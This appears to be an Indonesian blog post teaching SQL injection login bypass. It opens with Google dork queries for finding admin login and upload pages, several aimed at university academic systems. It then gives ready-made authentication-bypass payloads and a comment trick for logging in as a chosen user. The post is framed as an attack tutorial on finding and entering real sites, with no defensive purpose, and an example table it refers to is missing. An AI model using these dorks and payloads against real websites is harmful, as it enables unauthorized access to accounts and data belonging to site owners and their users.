inurl:/admin/upoload/ inurl:/admin/login.php/ intitle:Administrator
inurl:/admin/login.php intitle: Panel Admin
inurl:/admin/login.php site:in
inurl / mnux=login kampus
inurl / mnux=login akademik
inurl / mnux=login powered by sisfo
inurl /?mnux=login "powered by sisfo kampus"
inurl / mnux=login sisfo kampus
inurl / mnux=login admin
inurl >:& quot mnux =& quot akademik
inurl / mnux=login powered by sisfo
inurl :/? mnux login
inurl / mnux=login id /?mnux=login&lgn=frm siakad
inurl / mnux=login akademik administrasi akademik - universitas sisfokampus
inurl >:& quot mnux =& quot akademik
inurl:/admin/img/ ext:jpg
inurl:/admin/foto_berita
inurl:/admin/img/ "products"

inurl:/admin/img_gallery "blog"

Jadi SQLi, yaitu kita menginjeksi atau memanipulasi perintah SQL pada website. Untuk memanipulasi perintah SQL yang digunakan pada halaman login website dapat menggunakan payload seperti berikut :

' or '1'='1
' or 1=1 -- -'
'='' or '
') or ''='
') or 1=1 -- -

Payload di atas kita masukan untuk username dan password. Jika website tidak memiliki filter terhadap SQLi, maka kita akan dapat login tanpa memiliki akun. Mengapa bisa terjadi ? Untuk perintah SQL yang digunakan pada kasus ini adalah kebanyakan seperti ini :

SELECT * FROM member WHERE username='{$user}' AND password = '{$user}'

Setelah payload dimasukan, perintah SQL akan menjadi seperti ini :

SELECT * FROM member WHERE username='' or '1'='1' AND password = '' or '1'='1'

Maka database akan memberikan seluruh data member, contoh seperti ini :


Jika semisal data yang diambil dari database seperti diatas, kita akan ter-Login dengan menggunakan akun pada baris paling atas yaitu tono2. Jika ingin menggunakan akun lain semisal kita sudah tau username atau emailnya. Kita masukan payload hanya pada passwordnya saja atau dengan payload berikut ( masukan pada username atau email ) :

tono@mail.com' -- -'

Setelah payload dimasukan, perintah SQL akan menjadi seperti ini :

SELECT * FROM member WHERE username='tono@mail.com' -- -'' AND password = 'terserah'

Warna hijau adalah sebuah komentar pada perintah SQL jadi perintah setelah tanda "-- -" tidak akan terbaca atau tidak di eksekusi. Oke, segitu saja ya untuk postingan pertama ini semoga bermanfaat.